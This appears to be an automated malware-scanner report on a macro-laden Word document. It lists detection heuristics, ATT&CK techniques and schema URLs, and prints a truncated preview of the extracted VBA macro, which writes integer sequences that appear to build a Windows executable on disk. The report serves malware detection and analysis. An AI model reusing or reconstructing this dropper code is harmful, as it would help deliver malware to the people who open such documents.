MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is an OOXML document containing VBA macros, specifically a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Malware.Valyria-6714124-0' further supports its malicious nature. The document body content appears to be unrelated to the malicious functionality.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6714124-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6714124-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/iX/1.0/In document text (OOXML body / shared strings)
- http://ns.adobe.com/exif/1.0/In document text (OOXML body / shared strings)
- http://ns.adobe.com/pdf/1.3/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
- http://ns.adobe.com/tiff/1.0/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/rights/In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://www.iec.chIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 104504 bytes |
SHA-256: 24e45389b5db782cc7c1ebfbffb085d4bf11d6b735556e7ea177ce9f3f8afb9a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function FE(V As String) As Boolean On Error Resume Next: FE = (FileLen(V) > -1) End Function Private Property Let Y(Value As Long) Put #1, , Value End Property Private Sub CheckHash() Y = 9460301 Y = 3 Y = 4 Y = 65535 Y = 184 Y = 0 Y = 64 For I = 1 To 8 Y = 0 Next Y = 128 Y = 247078670 Y = -855002112 Y = 1275181089 Y = 1750344141 Y = 1881174889 Y = 1919381362 Y = 1663069537 Y = 1869508193 Y = 1700929652 Y = 1853190688 Y = 544106784 Y = 542330692 Y = 1701080941 Y = 168627502 Y = 36 Y = 0 Y = 17744 Y = 262476 Y = 1441267592 For I = 1 To 2 Y = 0 Next Y = 16908512 Y = 721163 Y = 13312 Y = 20992 Y = 0 Y = 21118 Y = 8192 Y = 24576 Y = 4194304 Y = 8192 Y = 512 Y = 4 Y = 0 Y = 4 Y = 0 Y = 65536 Y = 1024 Y = 0 Y = -2059403262 Y = 1048576 Y = 4096 Y = 1048576 Y = 4096 Y = 0 Y = 16 For I = 1 To 2 Y = 0 Next Y = 21036 Y = 79 Y = 32768 Y = 19632 For I = 1 To 4 Y = 0 Next Y = 57344 Y = 12 Y = 24576 Y = 28 For I = 1 To 10 Y = 0 Next Y = 8192 Y = 8 For I = 1 To 2 Y = 0 Next Y = 8200 Y = 72 For I = 1 To 2 Y = 0 Next Y = 2019914798 Y = 116 Y = 12932 Y = 8192 Y = 13312 Y = 1024 For I = 1 To 3 Y = 0 Next Y = 1610612768 Y = 1633973038 Y = 24948 Y = 312 Y = 24576 Y = 512 Y = 14336 For I = 1 To 3 Y = 0 Next Y = -1073741760 Y = 1920168494 Y = 99 Y = 19632 Y = 32768 Y = 19968 Y = 14848 For I = 1 To 3 Y = 0 Next Y = 1073741888 Y = 1818587694 Y = 25455 Y = 12 Y = 57344 Y = 512 Y = 34816 For I = 1 To 3 Y = 0 Next Y = 1107296320 For I = 1 To 122 Y = 0 Next Y = 21088 Y = 0 Y = 72 Y = 327682 Y = 12568 Y = 8468 Y = 1 Y = 100663305 For I = 1 To 12 Y = 0 Next Y = 1143662 Y = 142607872 Y = 1929641984 Y = 100663308 Y = 2432 Y = 176165892 Y = 704905216 Y = 274459 Y = 167 Y = 285212673 Y = 370 Y = 75888 Y = 176163328 Y = -570163200 Y = 36185358 Y = 168427520 Y = 808 Y = 2113986058 Y = 67108874 Y = 1914114605 Y = 1879048193 Y = 1139 Y = 688138 Y = 187368448 Y = 2686 Y = 356100 Y = 1915357696 Y = 1879048227 Y = 42610 Y = 294512 Y = 103285760 Y = -569769984 Y = 36185358 Y = 185204736 Y = 808 Y = 335601162 Y = 657150 Y = 124978688 Y = 336199680 Y = 256032 Y = 141759744 Y = -2146828288 Y = 67108870 Y = 185007636 Y = 1929773056 Y = 167772167 Y = 196616212 Y = 1930756096 Y = 167772168 Y = 1920 Y = 600068 Y = 2755072 Y = 7169 Y = 0 Y = 234885393 Y = 16777224 Y = 4390912 Y = 234903830 Y = 16777224 Y = 208923 Y = 44 Y = 285212674 Y = 2174 Y = 1339140 Y = 249431552 Y = 141349 Y = 671746560 Y = 167772163 Y = 108921054 Y = 537133056 Y = 1000 Y = 683797 Y = 707136000 Y = 4097 Y = 0 Y = 234884108 Y = 16777224 Y = 208923 Y = 44 Y = 285212675 Y = 2430 Y = 1011460 Y = 249431552 Y = 141349 Y = 671746560 Y = 167772163 Y = 125698270 Y = 537133056 Y = 3000 Y = 683797 Y = 707136000 Y = 4097 Y = 0 Y = 234884108 Y = 16777224 Y = 12219046 Y = 25194496 Y = 1912864768 Y = 1879048504 Y = 640 Y = 28602884 Y = 58748928 Y = 1912864768 Y = 1879048640 Y = 1152 Y = 10756 Y = 274451 Y = 83 Y = 285212676 Y = 122994 Y = 1779895152 Y = 880386 Y = 225053184 Y = 121252620 Y = 392759298 Y = 3624 Y = 993290 Y = 147982848 Y = 1058818 Y = 1483344384 Y = 542665239 Y = 256 Y = 1641176426 Y = 4392 Y = 1189898 Y = 321391104 Y = 185204736 Y = 1483347720 Y = 822675468 Y = 2754498 Y = 339987 Y = 52 Y = 285212677 Y = 1342335510 Y = 1494726542 Y = 722078570 Y = 105906722 Y = 105906793 Y = 33984873 Y = 1790414416 Y = 1483347800 Y = 65568 Y = -765629952 Y = 386309217 Y = 101341290 Y = 718942471 Y = 143379 Y = 54 Y = 285212678 Y = 122994 Y = 318901104 Y = 722277892 Y = 151261467 Y = 134679697 Y = 4392 Y = 1189898 Y = 321391104 Y ... (truncated) |
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 260096 bytes |
SHA-256: 309101604fc89c6fbe3a99bc6f8bf3917c1255fe67e90a043d7dec73d48c0c53 |
|||
|
Detection
ClamAV:
Doc.Malware.Valyria-6714124-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.